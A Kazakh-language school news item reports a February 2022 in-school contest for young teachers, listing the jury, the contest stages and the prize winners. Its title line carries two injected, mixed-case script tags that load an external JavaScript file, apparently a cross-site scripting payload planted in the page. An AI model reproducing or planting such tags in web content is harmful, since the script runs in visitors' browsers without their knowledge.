Жас мамандар сайысы—2022<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.02.2022 19 ақпан күні Иманжүсіп Құтпанұлы атындағы жалпы орта білім беретін мектебінде мектепішілік «Үздік Жас маман - 2022» байқауы өтті. Байқаудың мақсаты: жас мамандардың педагогикалық-психологиялық, әдістемелік, шығармашылық қабілеттерін байқау, оқушылармен қарым-қатынас орната білу қабілеттерін шыңдау, әріптестері арасында өзіндік орнын қалыптастыру. Байқауға 8 жас маман қатысты. Байқау мектеп директоры Туркестанбаева А.А. құттықтау сөзімен ашылды. Жас мамандар байқауды «Тек, алға!» әнімен ашты. Жүргізушілер көрермендерді әділ қазы алқаларымен таныстырды. 1. Туркестанбаева А.А. - мектеп директоры 2. Байгаскинова Кульбаршын Зейкеновна - оқу ісінің меңгерушісі 3. Жунусова А.К. - тәрбие ісінің меңгерушісі 4. Абдрахманова А.Е.- бейіндік оқыту ісі жөніндегі орынбасары Байқау 6 кезеңнен тұрды: 1. Таныстыру; 2. Панарамалық сабақтарын ютуб каналына жариялап, сол бойынша бағалану; 3. «Мен мұғаліммін» тақырыбында эссе жазу; 4. Педагогикалық жағдаятты шешу; 5. Портфолио 6. Өнер көрсету. Байқау қорытындысы бойынша жас мамандар төмендегідей «Мадақтамалармен» марапатталды. 1-орын қазақ тілі мен әдебиеті пәнінің мұғалімі Урынбаева Қаламқас; 2-орын ағылшын тілі пәнінің мұғалімі - Дауылбаева Меруерт; 2-орын орыс тілі мен әдебиеті пәнінің мұғалімі - Абдуллина Гульдарай Жанабаевна; 3-орын бастауыш сынып мұғалімі - Қапашева Қалуа; 3-орын ағылшын тілі пәнінің мұғалімі - Қаратай Ақбота; Белсенділік көрсеткен жас мамандар: Дене шынықтыру пәнінің мұғалімі - Тилеубек Ауез; Бастауыш сынып мұғалімі - Қалданқызы Арайлым; Ағылшын тілі пәнінің мұғалімі - Бақытнұр Өркен. Барлық жас мамандарды жеңістерімен құттықтаймыз, жетекшілік еткен тәлімгерлеріне алғыс айтамыз. Аудандық «Үздік Жас маман - 2022» байқауына жолдама алған бастауыш сынып мұғалімі Қапашова Қалуаға ақ жол тілейміз. Директордың бейіндік оқыту ісі жөніндегі орынбасары: Абдрахманова А.Е.
Просмотров: 476


Пікір қосу



Деректерді қолтаңбаға қосу